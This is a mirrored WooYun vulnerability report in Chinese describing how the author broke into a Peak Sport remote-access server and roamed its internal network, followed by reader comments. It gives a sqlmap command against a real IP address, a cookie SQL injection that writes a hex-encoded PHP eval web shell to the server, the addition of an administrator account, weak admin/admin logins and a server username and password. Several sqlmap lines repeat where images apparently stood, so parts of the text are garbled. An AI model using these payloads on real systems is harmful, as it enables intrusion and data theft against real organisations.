匹克某系统getshell（一次成功的内网漫游/成功getshell某系统）

admin

139803
文章

114
评论

2017年4月19日14:02:14评论546 views字数 246阅读0分49秒阅读模式

摘要

2016-04-06：细节已通知厂商并且等待厂商处理中
2016-04-06：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-11：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(48) 关注此漏洞

缺陷编号： WooYun-2016-193310

漏洞标题：匹克某系统getshell（一次成功的内网漫游/成功getshell某系统）

漏洞作者： DeadSea

提交时间： 2016-04-06 22:48

公开时间： 2016-04-11 22:50

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

16人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

http://218.5.173.228:90/CmxDownload.php

可以看到，这是科迈RAS系统

可以找乌云的案例，有许多处的sql注入

先来个cookie的sql注入

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

直接getshell吧

code 区域

http://*******/bugs/wooyun-2010-0130866

前辈的文章。在cookie处加入'即可获得绝对路径

code 区域

C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/Smarty-2.6.19/Client/

绝对路径

getshell

code 区域

RAS_UserInfo_UserName=wooyun' and 1=2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun.php'%23

可以看到前辈的这段代码是把

code 区域

0x776F6F79756E3C3F70687020706870696E666F28293B3F3E

这段代码写到Client/wooyun.php里

利用了hex加密，把0x去掉解密可以看到是wooyun<?php phpinfo();?>

成功写入

在把

code 区域

wooyun<?php @eval($_POST[wooyun]);?>

用hex加密

得到

code 区域

0x776f6f79756e3c3f70687020406576616c28245f504f53545b776f6f79756e5d293b3f3e

直接干~~

成功写入密码wooyun

code 区域

218.5.173.228:90/Client/wooyun2.php

cmd查看下权限

sy权限，直接添加管理员找端口，端口91.

成功进入

开启扫描器一顿扫射内网

发现了个

code 区域

http://10.0.10.38

世纪互联CactiEZ的cms。直接getshell

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

直接访问，

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

密码0

不知道为什么，服务器连接不上一句话。这很是费解

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

又找了找找到了这个

弱口令admin/admin

成功进入。

还有一个很奇怪的现象。

我发现许多内部系统连接的都是我上个sql注入

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

code 区域

C:/Python27/sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql

随便点个公告都会跳到http://info.peaksport.com/

里面应该会有管理员的帐号吧。不深入了

服务器帐号sea$密码sea

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-11 22:50

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-06 22:49 | DeadSea ( 普通白帽子 | Rank:284 漏洞数:63 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

2

秒审核我喜欢~

1# 回复此人
2016-04-06 22:49 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩有些厂商故意加你好友，和你聊...)

1

刺激我

2# 回复此人
2016-04-12 01:18 | YaXin ( 路人 | Rank:16 漏洞数:5 | 没有思路的新人)

1

大牛在么找的那个参数 RAS_UserInfo_UserName

3# 回复此人
2016-04-12 07:32 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

1

@DeadSea 本人外形俊朗、眉清目秀、玉树临风、有明星作风，首批通过乌云帅哥体系认证，你这个臭不要脸的劲儿，快赶上我了

4# 回复此人
2016-04-12 10:22 | Shrek ( 路人 | Rank:14 漏洞数:4 | 自信可以摧毁陈旧的自我。)

1

感谢楼主，写的很详细，涨姿势了~

5# 回复此人

漏洞概要 关注数(48) 关注此漏洞

缺陷编号： WooYun-2016-193310

漏洞标题： 匹克某系统getshell（一次成功的内网漫游/成功getshell某系统）

相关厂商： epeaksport.com

漏洞作者： DeadSea

提交时间： 2016-04-06 22:48

公开时间： 2016-04-11 22:50

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

16人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(48) 关注此漏洞

漏洞标题：匹克某系统getshell（一次成功的内网漫游/成功getshell某系统）

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分